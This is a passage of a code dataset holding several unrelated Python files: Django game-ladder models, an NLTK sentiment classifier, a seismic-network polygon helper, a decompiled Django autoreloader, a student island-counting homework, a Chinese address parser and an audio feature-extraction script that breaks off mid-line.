Subgame.objects.all().filter(parent=self)\n\n def __unicode__(self):\n return u'%s %s vs %s, %s won' % (self.start_time, self.player_left, self.player_right, self.winner)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass PlayedGameForm(ModelForm):\n class Meta:\n model = PlayedGame\n fields = (\n 'start_time',\n 'player_left',\n 'player_right',\n 'winner',\n 'ranked'\n )\n labels = {\n 'start_time' : _('Start time'),\n 'player_left' : _('Left player'),\n 'player_right' : _('Right player'),\n 'winner' : _('Winner'),\n 'ranked' : _('Ranked'),\n }\n widgets = {\n 'start_time' : DateTimeWidget(usel10n=True,\n bootstrap_version=3,\n options={'format' : 'yyyy-mm-dd hh:ii',\n 'weekStart' : '1'})\n }\n\n def __init__(self, *args, **kwargs):\n available_players = kwargs.pop('available_players', None)\n super(ModelForm, self).__init__(*args, **kwargs)\n\n if available_players:\n self.fields['player_left'].queryset = available_players\n self.fields['player_right'].queryset = available_players\n\n# a subgame to a game that has been played\nclass Subgame(models.Model):\n # the game this belongs to\n parent = models.ForeignKey(PlayedGame)\n # the map that was played.\n map_played = models.CharField(max_length=100, blank=True)\n # the lives left for the left player at the end of the match\n pl_lives = models.IntegerField()\n # the lives left for the right player at the end of the match\n pr_lives = models.IntegerField()\n # the replay file for this game\n replay_file = models.FileField(blank=True, upload_to=\"replays/\")\n\n def __unicode__(self):\n return u'%i - %i' % (self.pl_lives, self.pr_lives)\n\n def clean(self):\n pass\n\n class Meta:\n pass\n\nclass SubgameForm(ModelForm):\n class Meta:\n model = Subgame\n fields = (\n 'map_played',\n 'pl_lives',\n 'pr_lives',\n 'replay_file',\n )\n\n labels = {\n 'map_played' : _('Map played'),\n 'pl_lives' : _('Left player lives left'),\n 'pr_lives' : _('Right player lives left'),\n 'replay_file' : _('Replay file')\n }\n\nSubgameFormSet = inlineformset_factory(PlayedGame, Subgame, max_num=10, extra=1,\n can_delete=False, form=SubgameForm)\n\n# Keeps track of how ranking points etc was changed for a player.\n# Used to keep track of before/after for games and tournaments\nclass PointsChanged(models.Model):\n # the player this belongs to\n player = models.ForeignKey(Player)\n # the tournament this belongs to. Both this and game may\n # not both be set (or both be null)\n tournament = models.ForeignKey(Tournament, blank=True, null=True)\n # the game this belongs to. Both this and tournament may\n # not both be set (or both be null)\n game = models.ForeignKey(PlayedGame, blank=True, null=True)\n # ranking points before match\n rp_before = models.IntegerField()\n # ranking points after match\n rp_after = models.IntegerField()\n # pool points before match\n pp_before = models.IntegerField()\n # pool points after match\n pp_after = models.IntegerField()\n\n def __unicode__(self):\n return u'%s_%s_%s_%s_%s_%s_%s' % (self.player, self.tournament,\n self.game, self.rp_before,\n self.rp_after, self.pp_before,\n self.pp_after)\n def clean(self):\n pass\n\n class Meta:\n pass\n","sub_path":"lierogbg/index/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"578425037","text":"import nltk\nimport random\nfrom nltk.corpus import movie_reviews\n\ndef main():\n\n\t# documents list will have the list of words and the category of the document (either pos or neg)\n\tdocuments = []\n\n\tfor category in movie_reviews.categories():\n\t\tfor fileid in movie_reviews.fileids(category):\n\t\t\tdocuments.append((list(movie_reviews.words(fileid)), category))\n\n\t# grab all the words in a variable\t\t\n\tall_words = []\n\n\tfor w in movie_reviews.words():\n\t\tall_words.append(w.lower())\n\n\t# frequency dist\n\tall_words = nltk.FreqDist(all_words)\n\n\t# considering the top 3000 words as word features\n\tword_features = list(all_words.keys())[:3000]\n\t# print(len(word_features))\n\n\t# function which will create words features for a given document. We have selected top 3000 words as features according to the freq dist\n\t# for these 300 features we will get true or false according to their presence in the document\n\tdef find_features(document):\n\t\twords = set(document)\n\t\tfeatures = {}\n\t\tfor w in word_features:\n\t\t\tfeatures[w] = (w in words)\n\t\treturn features\n\n\t# print(len((find_features(movie_reviews.words('neg/cv000_29416.txt')))))\n\t# print((find_features(movie_reviews.words('pos/cv014_13924.txt'))))\n\n\t# for each document it extracts the word features (wheather true or false along with the lablel i.e. pos or neg)\n\tfeaturesets = [(find_features(rev), category) for (rev, category) in documents]\n\n\t# print(featuresets[:1][0])\n\t# test = featuresets[:1][0]\n\t# test = test[0]\n\t# print(len(test))\n\t# for e in featuresets[:1][0\n\t# \tprint(e)\n\n\t# test = [cat for (rev, cat) in documents]\n\t# my_dict = {}\n\n\t# for ele in test:\n\t# \tif ele not in my_dict.keys():\n\t# \t\tmy_dict[ele] = 1\n\t# \telif ele in my_dict.keys():\n\t# \t\tmy_dict[ele] += 1\n\n\t# print(my_dict)\n\n\t# print(featuresets[0])\n\n\ttraining_set = featuresets[:1900]\n\n\ttesting_set = featuresets[1900:]\n\n\tclf = nltk.NaiveBayesClassifier.train(training_set)\n\tprint(\"Classifier test percentage: \", (nltk.classify.accuracy(clf, testing_set))*100)\n\n\tclf.show_most_informative_features(15)\n\t\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"classification_words_as_features.py","file_name":"classification_words_as_features.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"421503652","text":"#!/usr/bin/env python\n\nimport numpy as np\n\nfrom mpl_toolkits.basemap import pyproj\nfrom shapely.geometry import MultiPoint, Point\n\n\n# WGS84 datum (Lat/Lon geographic coordinate system)\nwgs84 = pyproj.Proj(init='EPSG:4326')\n\n# Lambert Azimuthal Equal Area (laea) projection\npj_laea = pyproj.Proj(proj='laea', lat_0=90, lon_0=0, x_0=0, y_0=0,\n ellps='WGS84', datum='WGS84', units='m', no_defs=True)\n\n\nclass SeismicNetwork(object):\n def __init__(self, net_lats, net_lons):\n poly_x, poly_y = pyproj.transform(wgs84, pj_laea, net_lons, net_lats)\n self.polygon = MultiPoint(zip(poly_x, poly_y)).convex_hull\n\n def contains(self, lat, lon):\n x, y = pyproj.transform(wgs84, pj_laea, lon, lat)\n point = Point(x, y)\n if self.polygon.contains(point):\n return True\n else:\n return False\n\n def inside_network(self, epi_lats, epi_lons):\n \"\"\"\n This function returns epicenter coordinates located inside a seismic\n station network. The point-in-polygon problem is solved based on ray\n casting method.\n\n :param epi_lats: Latitudes of earthquake epicenters.\n :param epi_lons: Longitudes of earthquake epicenters.\n\n :type epi_lats: numpy.array, list/tuple or scalar\n :type epi_lons: numpy.array, list/tuple or scalar\n\n :returns:\n Epicenter coordinates located within network. The first and second\n columns are latitude and longitude, respectively.\n :rtype: numpy.array\n \"\"\"\n epi_x, epi_y = pyproj.transform(wgs84, pj_laea, epi_lons, epi_lats)\n r = []\n for i, (x, y) in enumerate(zip(epi_x, epi_y)):\n epicenter = Point(x, y)\n if epicenter.within(self.polygon):\n r.append((epi_lats[i], epi_lons[i]))\n return np.array(r)\n","sub_path":"seismic_network.py","file_name":"seismic_network.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465928519","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /tmp/pip-install-n_sfyb/Django/django/utils/autoreload.py\n# Compiled at: 2019-02-14 00:35:17\nimport os, signal, subprocess, sys, time, traceback\nfrom django.apps import apps\nfrom django.conf import settings\nfrom django.core.signals import request_finished\nfrom django.utils import six\nfrom django.utils._os import npath\nfrom django.utils.encoding import get_system_encoding\nfrom django.utils.six.moves import _thread as thread\ntry:\n import threading\nexcept ImportError:\n pass\n\ntry:\n import termios\nexcept ImportError:\n termios = None\n\nUSE_INOTIFY = False\ntry:\n import pyinotify\n fd = pyinotify.INotifyWrapper.create().inotify_init()\n if fd >= 0:\n USE_INOTIFY = True\n os.close(fd)\nexcept ImportError:\n pass\n\nRUN_RELOADER = True\nFILE_MODIFIED = 1\nI18N_MODIFIED = 2\n_mtimes = {}\n_win = sys.platform == 'win32'\n_exception = None\n_error_files = []\n_cached_modules = set()\n_cached_filenames = []\n\ndef gen_filenames(only_new=False):\n \"\"\"\n Returns a list of filenames referenced in sys.modules and translation\n files.\n \"\"\"\n global _cached_filenames\n global _cached_modules\n module_values = set(sys.modules.values())\n _cached_filenames = clean_files(_cached_filenames)\n if _cached_modules == module_values:\n if only_new:\n return []\n else:\n return _cached_filenames + clean_files(_error_files)\n\n new_modules = module_values - _cached_modules\n new_filenames = clean_files([ filename.__file__ for filename in new_modules if hasattr(filename, '__file__')\n ])\n if not _cached_filenames and settings.USE_I18N:\n basedirs = [\n os.path.join(os.path.dirname(os.path.dirname(__file__)), 'conf', 'locale'),\n 'locale']\n for app_config in reversed(list(apps.get_app_configs())):\n basedirs.append(os.path.join(npath(app_config.path), 'locale'))\n\n basedirs.extend(settings.LOCALE_PATHS)\n basedirs = [ os.path.abspath(basedir) for basedir in basedirs if os.path.isdir(basedir)\n ]\n for basedir in basedirs:\n for dirpath, dirnames, locale_filenames in os.walk(basedir):\n for filename in locale_filenames:\n if filename.endswith('.mo'):\n new_filenames.append(os.path.join(dirpath, filename))\n\n _cached_modules = _cached_modules.union(new_modules)\n _cached_filenames += new_filenames\n if only_new:\n return new_filenames + clean_files(_error_files)\n else:\n return _cached_filenames + clean_files(_error_files)\n\n\ndef clean_files(filelist):\n filenames = []\n for filename in filelist:\n if not filename:\n continue\n if filename.endswith('.pyc') or filename.endswith('.pyo'):\n filename = filename[:-1]\n if filename.endswith('$py.class'):\n filename = filename[:-9] + '.py'\n if os.path.exists(filename):\n filenames.append(filename)\n\n return filenames\n\n\ndef reset_translations():\n import gettext\n from django.utils.translation import trans_real\n gettext._translations = {}\n trans_real._translations = {}\n trans_real._default = None\n trans_real._active = threading.local()\n return\n\n\ndef inotify_code_changed():\n \"\"\"\n Checks for changed code using inotify. After being called\n it blocks until a change event has been fired.\n \"\"\"\n\n class EventHandler(pyinotify.ProcessEvent):\n modified_code = None\n\n def process_default(self, event):\n if event.path.endswith('.mo'):\n EventHandler.modified_code = I18N_MODIFIED\n else:\n EventHandler.modified_code = FILE_MODIFIED\n\n wm = pyinotify.WatchManager()\n notifier = pyinotify.Notifier(wm, EventHandler())\n\n def update_watch(sender=None, **kwargs):\n if sender and getattr(sender, 'handles_files', False):\n return\n mask = pyinotify.IN_MODIFY | pyinotify.IN_DELETE | pyinotify.IN_ATTRIB | pyinotify.IN_MOVED_FROM | pyinotify.IN_MOVED_TO | pyinotify.IN_CREATE | pyinotify.IN_DELETE_SELF | pyinotify.IN_MOVE_SELF\n for path in gen_filenames(only_new=True):\n wm.add_watch(path, mask)\n\n request_finished.connect(update_watch)\n update_watch()\n notifier.check_events(timeout=None)\n notifier.read_events()\n notifier.process_events()\n notifier.stop()\n return EventHandler.modified_code\n\n\ndef code_changed():\n global _mtimes\n global _win\n for filename in gen_filenames():\n stat = os.stat(filename)\n mtime = stat.st_mtime\n if _win:\n mtime -= stat.st_ctime\n if filename not in _mtimes:\n _mtimes[filename] = mtime\n continue\n if mtime != _mtimes[filename]:\n _mtimes = {}\n try:\n del _error_files[_error_files.index(filename)]\n except ValueError:\n pass\n else:\n if filename.endswith('.mo'):\n return I18N_MODIFIED\n else:\n return FILE_MODIFIED\n\n return False\n\n\ndef check_errors(fn):\n\n def wrapper(*args, **kwargs):\n global _exception\n try:\n fn(*args, **kwargs)\n except Exception:\n _exception = sys.exc_info()\n et, ev, tb = _exception\n if getattr(ev, 'filename', None) is None:\n filename = traceback.extract_tb(tb)[(-1)][0]\n else:\n filename = ev.filename\n if filename not in _error_files:\n _error_files.append(filename)\n raise\n\n return\n\n return wrapper\n\n\ndef raise_last_exception():\n if _exception is not None:\n six.reraise(*_exception)\n return\n\n\ndef ensure_echo_on():\n if termios:\n fd = sys.stdin\n if fd.isatty():\n attr_list = termios.tcgetattr(fd)\n if not attr_list[3] & termios.ECHO:\n attr_list[3] |= termios.ECHO\n if hasattr(signal, 'SIGTTOU'):\n old_handler = signal.signal(signal.SIGTTOU, signal.SIG_IGN)\n else:\n old_handler = None\n termios.tcsetattr(fd, termios.TCSANOW, attr_list)\n if old_handler is not None:\n signal.signal(signal.SIGTTOU, old_handler)\n return\n\n\ndef reloader_thread():\n ensure_echo_on()\n if USE_INOTIFY:\n fn = inotify_code_changed\n else:\n fn = code_changed\n while RUN_RELOADER:\n change = fn()\n if change == FILE_MODIFIED:\n sys.exit(3)\n elif change == I18N_MODIFIED:\n reset_translations()\n time.sleep(1)\n\n\ndef restart_with_reloader():\n while True:\n args = [sys.executable] + [ '-W%s' % o for o in sys.warnoptions ] + sys.argv\n new_environ = os.environ.copy()\n if _win and six.PY2:\n encoding = get_system_encoding()\n for key in new_environ.keys():\n str_key = key.decode(encoding).encode('utf-8')\n str_value = new_environ[key].decode(encoding).encode('utf-8')\n del new_environ[key]\n new_environ[str_key] = str_value\n\n new_environ['RUN_MAIN'] = 'true'\n exit_code = subprocess.call(args, env=new_environ)\n if exit_code != 3:\n return exit_code\n\n\ndef python_reloader(main_func, args, kwargs):\n if os.environ.get('RUN_MAIN') == 'true':\n thread.start_new_thread(main_func, args, kwargs)\n try:\n reloader_thread()\n except KeyboardInterrupt:\n pass\n\n else:\n try:\n exit_code = restart_with_reloader()\n if exit_code < 0:\n os.kill(os.getpid(), -exit_code)\n else:\n sys.exit(exit_code)\n except KeyboardInterrupt:\n pass\n\n\ndef jython_reloader(main_func, args, kwargs):\n from _systemrestart import SystemRestart\n thread.start_new_thread(main_func, args)\n while True:\n if code_changed():\n raise SystemRestart\n time.sleep(1)\n\n\ndef main(main_func, args=None, kwargs=None):\n if args is None:\n args = ()\n if kwargs is None:\n kwargs = {}\n if sys.platform.startswith('java'):\n reloader = jython_reloader\n else:\n reloader = python_reloader\n wrapped_main_func = check_errors(main_func)\n reloader(wrapped_main_func, args, kwargs)\n return","sub_path":"pycfiles/djx-0.0.4-py2-none-any/autoreload.py","file_name":"autoreload.py","file_ext":"py","file_size_in_byte":8632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530976798","text":"# ----------------------------------------------------------\n# -------- HW 7: Island ---------\n# ----------------------------------------------------------\n\n# ----------------------------------------------------------\n# Please answer these questions after having completed this\n# program\n# ----------------------------------------------------------\n# Name: Brian Veber (This one was submitted on time, see submission 15 at Apr 28 3:14pm)\n# Hours spent on program: 6\n# Collaborators and sources: Tutors (Wen. and Thurs.), Brodie Cohen, Shamarcus Doty\n# (List any collaborators or sources here.)\n# ----------------------------------------------------------\n\n\n# Complete your code for the island program here\n# Define and write and helper functions you want/need!\n\ndef island_searcher(terr, used, row, column):\n '''\n All shell testing done through the island_count function\n ---\n Through if statements and recursion, the function checks for unique\n sets of islands (denoted 'X'). If there is a disconnect in an island,\n then a new island is accounted for. It does not count duplicate islands.\n '''\n \n used[row][column] = 0 #Create island located variable\n\n if column + 1 < len(terr[0]): #Checks a new column space\n #print (column)\n if row < len(terr):\n #print (row)\n if used[row][column + 1] == 'X':\n #print (used)\n if terr[row][column+1] == 'X': #Checks for new island mark\n island_searcher(terr, used, row, column + 1) #Recursive function runs if it has found another part of an attached island\n \n if column - 1 >= 0: #Checks a new column space\n if row < len(terr):\n #print (row)\n if used[row][column-1] == 'X':\n if terr[row][column-1] == 'X': #Checks for new island mark\n island_searcher(terr, used, row, column - 1)\n \n if column < len(terr[0]):\n #print (column)\n #print (row)\n if row + 1 < len(terr): #Checks a new row space\n if used[row+1][column] == 'X':\n if terr[row + 1][column] == 'X': #Checks for new island mark\n island_searcher(terr, used, row + 1, column)\n \n if column < len(terr[0]):\n if row-1 > 0: #Checks a new row space\n if used[row-1][column] == 'X':\n if terr[row-1][column] == 'X': #Checks for new island mark\n island_searcher(terr, used, row - 1, column)\n \ndef island_count(terr):\n '''\n Goes through the rows and columns in the given island set and runs the\n island_searcher program to find the total number of unique islands, which\n is returned by 'islandcount.'\n ---\n Testing:\n Enter islands filename to load: islands_7x15.txt\n 8 island(s)\n Enter islands filename to load: islands_6x6.txt\n 5 island(s)\n '''\n used = terr[:] #Set used variable\n islandcount = 0 #Set island count\n \n for row in range(len(used)): #Runs through rows\n for column in range(len(used[row])): #Runs through columns\n if used[row][column] == 'X': #Checks for island markers\n islandcount += 1\n #print (islandcount)\n island_searcher(terr, used, row, column) #Runs through island_searcher to check what part of an island the marker is\n\n return islandcount #Returns island count\n\n#----------------------------------------------------------------------------------\n# If, when you execute \"Run Module\" in IDLE or when you run this script,\n# you want to automatically run the main() function, which\n# prompts for a filename, loads the map, and then calls your island_count\n# function, then change this line to True\n\nrun_main = True\n\n\n#----------------------------------------------------------------------------------\n# Don't change the code below this line\n\ndef load_terr(filename):\n ''' (str) -> list of lists of strings\n Returns a table representing the grid of ~ and X in the given filename '''\n \n try:\n f = open(filename)\n terr = []\n for line in f:\n if len(line.strip()) > 0:\n terr.append(list(line[:-1]))\n f.close()\n return terr\n\n except IOError:\n return None\n\ndef main():\n filename = input('Enter islands filename to load: ')\n terr = load_terr(filename)\n if terr is None:\n print('Error opening', filename)\n return\n else:\n count = island_count(terr)\n print(count, 'island(s)')\n\n\nif __name__ == '__main__' and run_main:\n main()\n\n","sub_path":"hw_07/hw_07_island_final.py","file_name":"hw_07_island_final.py","file_ext":"py","file_size_in_byte":4656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"604258017","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n\n# !/usr/bin/env python\n# encoding: utf-8\n# description: 从字符串中提取省市县等名称,用于从纯真库中解析解析地理数据\n\nimport re\n\n# 匹配规则必须含有u,可以没有r\n# 这里第一个分组的问号是懒惰匹配,必须这么做\nPATTERN = r'([\\u4e00-\\u9fa5]{2,5}?(?:省|自治区|市))([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县|州))' \\\n r'{0,1}([\\u4e00-\\u9fa5]{2,7}?(?:市|区|县)){0,1}'\ndata_list = ['北京市', '陕西省西安市雁塔区', '西班牙', '北京市海淀区', '黑龙江省佳木斯市汤原县', '内蒙古自治区赤峰市',\n '贵州省黔南州贵定县', '新疆维吾尔自治区伊犁州奎屯市']\n\nfor data in data_list:\n print(data)\n country = data\n province = ''\n city = ''\n district = ''\n pattern = re.compile(PATTERN)\n m = pattern.search(data)\n if not m:\n print(country + '|||')\n continue\n country = '中国'\n if m.lastindex >= 1:\n province = m.group(1)\n if m.lastindex >= 2:\n city = m.group(2)\n if m.lastindex >= 3:\n district = m.group(3)\n out = '%s|%s|%s|%s' % (country, province, city, district)\n print(out)\n","sub_path":"wordcloud/pc_cn.py","file_name":"pc_cn.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596734980","text":"import numpy as np\nimport os\nfrom pathlib import Path\nfrom librosa.core import load\nfrom librosa.feature import melspectrogram\nfrom tqdm import tqdm\nimport muda\nfrom muda.deformers import BackgroundNoise\nimport jams\n\nimport meta\n\n\nclass Initializer:\n @classmethod\n def generate_feature_matrix(cls):\n \"\"\"\n Generate the mel spectrogram feature matrix for each audio file and save it.\n\n :return: None\n \"\"\"\n # create the folder if not exists\n def generate_feature_matrix(src_dir, dst_dir):\n \"\"\"\n Generate the feature matrices for all the audio files in the src_dir and save them to dst_dir.\n\n :param src_dir: Path object, the directory where audio files are saved\n :param dst_dir: Path object, the directory where feature matrix are saved\n :return: None\n \"\"\"\n # create the folder if not exists\n os.makedirs(dst_dir, exist_ok=True)\n\n # feature extraction\n for audio_file_path in src_dir.iterdir():\n print('Processing {}.'.format(audio_file_path.name))\n\n # load the audio file\n data, sr = load(str(audio_file_path))\n\n # normalization\n data = data / data.max()\n\n # compute the parameters\n frame_length = int(meta.frame_time_length * sr)\n hop_length = int(meta.hop_time_length * sr)\n\n # compute mel spectrogram\n mel_spectrogram_matrix = melspectrogram(y=data, sr=sr, n_fft=frame_length, hop_length=hop_length,\n power=1.0, n_mels=meta.mel_band_num)\n\n # add zeros to prepare for stacking\n padding_matrix = np.zeros((meta.mel_band_num, meta.lr_stack_frame_num))\n padded_mel_spectrogram_matrix = np.concatenate((padding_matrix, mel_spectrogram_matrix, padding_matrix),\n axis=1)\n\n # stack several consecutive frames together\n stack_frames_num = 2 * meta.lr_stack_frame_num + 1\n feature_matrix = np.zeros((meta.feature_dim, mel_spectrogram_matrix.shape[1]))\n for i in range(mel_spectrogram_matrix.shape[1]):\n feature_matrix[:, i] = padded_mel_spectrogram_matrix[:, i:i + stack_frames_num].T.reshape((1, -1))\n\n # save the feature matrix\n print('Saving feature matrix with shape {}.'.format(feature_matrix.shape))\n feature_file_path = dst_dir / audio_file_path.stem\n np.save(str(feature_file_path), feature_matrix)\n\n if str(audio_file_path.name).startswith('test'):\n break\n\n if meta.version == '2017.3':\n generate_feature_matrix(meta.audio_file_dir, meta.feature_file_dir)\n else: # meta.version == '2016.2':\n generate_feature_matrix(meta.train_audio_file_dir, meta.train_feature_file_dir)\n # generate_feature_matrix(meta.dev_audio_file_dir, meta.dev_feature_file_dir)\n generate_feature_matrix(meta.test_audio_file_dir, meta.test_feature_file_dir)\n # generate_feature_matrix(meta.noisy_audio_file_dir, meta.noisy_feature_file_dir)\n print('Feature extraction done.')\n\n @classmethod\n def generate_groundtruth_matrix(cls):\n \"\"\"\n Generate the groundtruth matrices from the annotation files.\n :return: None\n \"\"\"\n def generate_groundtruth_matrix(src_dir, dst_dir, feature_dir):\n \"\"\"\n Generate the groundtruth matrices from the annotation files in src_dir and save to dst_dir.\n\n :param src_dir: Path object, the directory where annotation files are saved\n :param dst_dir: Path object, the directory where groundtruth matrices are going to be saved\n :param feature_dir: Path object, the directory where feature matrices are saved\n :return: None\n \"\"\"\n # create the folder if not exists\n os.makedirs(dst_dir, exist_ok=True)\n\n # groundtruth matrix generation\n for annotation_file_path in src_dir.iterdir():\n print('Processing {}.'.format(annotation_file_path.name))\n\n # read the annotation file\n with open(annotation_file_path) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n\n # load the feature matrix and initialize the groundtruth matrix based on its shape\n feature_file_path = str(feature_dir / annotation_file_path.stem) + '.npy'\n feature_matrix = np.load(feature_file_path)\n groundtruth_matrix = np.zeros((len(meta.class_dict), feature_matrix.shape[1]))\n\n # handle the annotation line by line\n for line in lines:\n # read the annotation detail\n if meta.version == '2017.3':\n start_time = float(line[2])\n end_time = float(line[3])\n class_name = line[4]\n else: # meta.version == '2016.2':\n start_time = float(line[0])\n end_time = float(line[1])\n class_name = line[2]\n class_index = meta.class_dict[class_name]\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # set the corresponding element in groundtruth matrix to 1\n groundtruth_matrix[class_index, start_index:end_index + 1] = 1\n\n # save the groundtruth matrix\n groundtruth_file_path = dst_dir / annotation_file_path.stem\n np.save(str(groundtruth_file_path), groundtruth_matrix)\n\n if meta.version == '2017.3':\n generate_groundtruth_matrix(meta.annotation_file_dir, meta.groundtruth_file_dir, meta.feature_file_dir)\n else: # meta.version == '2016.2':\n generate_groundtruth_matrix(meta.dev_annotation_file_dir, meta.dev_groundtruth_file_dir, meta.dev_feature_file_dir)\n generate_groundtruth_matrix(meta.test_annotation_file_dir, meta.test_groundtruth_file_dir, meta.test_feature_file_dir)\n\n # generate groundtruth matrices for training set\n # create the folder if not exists\n os.makedirs(meta.train_groundtruth_file_dir, exist_ok=True)\n\n # groundtruth matrix generation\n for feature_file_path in meta.train_feature_file_dir.iterdir():\n # find the name and index of the class\n class_index = None\n file_name = feature_file_path.stem\n for class_name in meta.class_dict:\n if str(file_name).startswith(class_name):\n class_index = meta.class_dict[class_name]\n break\n feature_matrix = np.load(feature_file_path)\n groundtruth_matrix = np.zeros((len(meta.class_dict), feature_matrix.shape[1]))\n groundtruth_matrix[class_index] = 1\n groundtruth_file_path = meta.train_groundtruth_file_dir / (file_name + '.npy')\n np.save(groundtruth_file_path, groundtruth_matrix)\n\n print('Groundtruth generation done.')\n\n @classmethod\n def initialize_cross_validation(cls):\n \"\"\"\n Compute and save the feature and groundtruth matrix based on the cross validation setup for 2017.3.\n\n :return: None\n \"\"\"\n if meta.version == '2017.3':\n # create the folder if not exists\n os.makedirs(meta.cross_validation_data_dir, exist_ok=True)\n\n # cross validation data generation\n for k in range(1, 1 + meta.k_fold_num):\n print('Processing fold {}/{}.'.format(k, meta.k_fold_num))\n\n train_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_train.txt'.format(k)\n test_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_test.txt'.format(k)\n train_feature_matrix = np.zeros((meta.feature_dim, 0))\n train_groundtruth_matrix = np.zeros((len(meta.class_dict), 0))\n test_feature_matrix = np.zeros_like(train_feature_matrix)\n test_groundtruth_matrix = np.zeros_like(train_groundtruth_matrix)\n\n # create the directory to store data if not exists\n data_dir = meta.cross_validation_data_dir\n\n # compute the feature and groundtruth matrix of training set\n with open(str(train_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n last_audio_name = ''\n feature_matrix = np.zeros((0, 0))\n groundtruth_matrix = np.zeros((0, 0))\n for line in tqdm(lines):\n # read the detail\n audio_name = Path(line[0]).stem\n start_time = float(line[2])\n end_time = float(line[3])\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # compute the new matrix\n if audio_name != last_audio_name:\n feature_matrix = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n groundtruth_matrix = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n train_feature_matrix_temp = feature_matrix[:, start_index:end_index + 1]\n train_groundtruth_matrix_temp = groundtruth_matrix[:, start_index:end_index + 1]\n train_feature_matrix = np.concatenate((train_feature_matrix, train_feature_matrix_temp), axis=1)\n train_groundtruth_matrix = np.concatenate((train_groundtruth_matrix, train_groundtruth_matrix_temp),\n axis=1)\n\n # compute the feature and groundtruth matrix of test set\n with open(str(test_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n for line in tqdm(lines):\n audio_name = Path(line[0]).stem\n test_feature_matrix_temp = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n test_groundtruth_matrix_temp = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n test_feature_matrix = np.concatenate((test_feature_matrix, test_feature_matrix_temp), axis=1)\n test_groundtruth_matrix = np.concatenate((test_groundtruth_matrix, test_groundtruth_matrix_temp),\n axis=1)\n\n # save the matrices\n train_feature_matrix_file_name = data_dir / 'fold{}_train_feature'.format(k)\n train_groundtruth_matrix_file_name = data_dir / 'fold{}_train_groundtruth'.format(k)\n test_feature_matrix_file_name = data_dir / 'fold{}_test_feature'.format(k)\n test_groundtruth_matrix_file_name = data_dir / 'fold{}_test_groundtruth'.format(k)\n np.save(str(train_feature_matrix_file_name), train_feature_matrix)\n np.save(str(train_groundtruth_matrix_file_name), train_groundtruth_matrix)\n np.save(str(test_feature_matrix_file_name), test_feature_matrix)\n np.save(str(test_groundtruth_matrix_file_name), test_groundtruth_matrix)\n\n @classmethod\n def initialize_test_data(cls):\n \"\"\"\n Create simple data for test purpose for 2017.3.\n\n :return: None\n \"\"\"\n if meta.version == '2017.3':\n k = 1\n\n # two classes selected for testing purpose (class 0 and class 1)\n start_test_class_index = 0\n end_test_class_index = 2\n\n train_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_train.txt'.format(k)\n test_txt_file_path = meta.evaluation_setup_file_dir / 'street_fold{}_test.txt'.format(k)\n train_feature_matrix = np.zeros((meta.feature_dim, 0))\n train_groundtruth_matrix = np.zeros((len(range(start_test_class_index, end_test_class_index)), 0))\n test_feature_matrix = np.zeros_like(train_feature_matrix)\n test_groundtruth_matrix = np.zeros_like(train_groundtruth_matrix)\n\n # create the directory to store data if not exists\n data_dir = meta.cross_validation_data_dir\n\n # compute the feature and groundtruth matrix of training set\n with open(str(train_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n last_audio_name = ''\n original_feature_matrix = np.zeros((0, 0))\n original_groundtruth_matrix = np.zeros((0, 0))\n for line in tqdm(lines):\n # read the detail\n audio_name = Path(line[0]).stem\n start_time = float(line[2])\n end_time = float(line[3])\n class_name = line[4]\n class_index = meta.class_dict[class_name]\n\n # only consider selected classes\n if class_index not in range(start_test_class_index, end_test_class_index):\n continue\n\n # compute the start and end frame index\n start_index = int(start_time / meta.hop_time_length)\n end_index = int(end_time / meta.hop_time_length)\n\n # compute the new matrix\n if audio_name != last_audio_name:\n original_feature_matrix = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n original_groundtruth_matrix = np.load(str(meta.groundtruth_file_dir / audio_name) + '.npy')\n train_feature_matrix_temp = original_feature_matrix[:, start_index:end_index + 1]\n train_groundtruth_matrix_temp = original_groundtruth_matrix[start_test_class_index:end_test_class_index, start_index:end_index + 1]\n train_feature_matrix = np.concatenate((train_feature_matrix, train_feature_matrix_temp), axis=1)\n train_groundtruth_matrix = np.concatenate((train_groundtruth_matrix, train_groundtruth_matrix_temp), axis=1)\n\n # compute the feature and groundtruth matrix of test set\n with open(str(test_txt_file_path)) as f:\n lines = f.readlines()\n lines = [line.rstrip().split('\\t') for line in lines]\n for line in tqdm(lines):\n audio_name = Path(line[0]).stem\n test_feature_matrix_temp = np.load(str(meta.feature_file_dir / audio_name) + '.npy')\n test_groundtruth_matrix_temp = np.load(str(meta.groundtruth_file_dir / audio_name) + 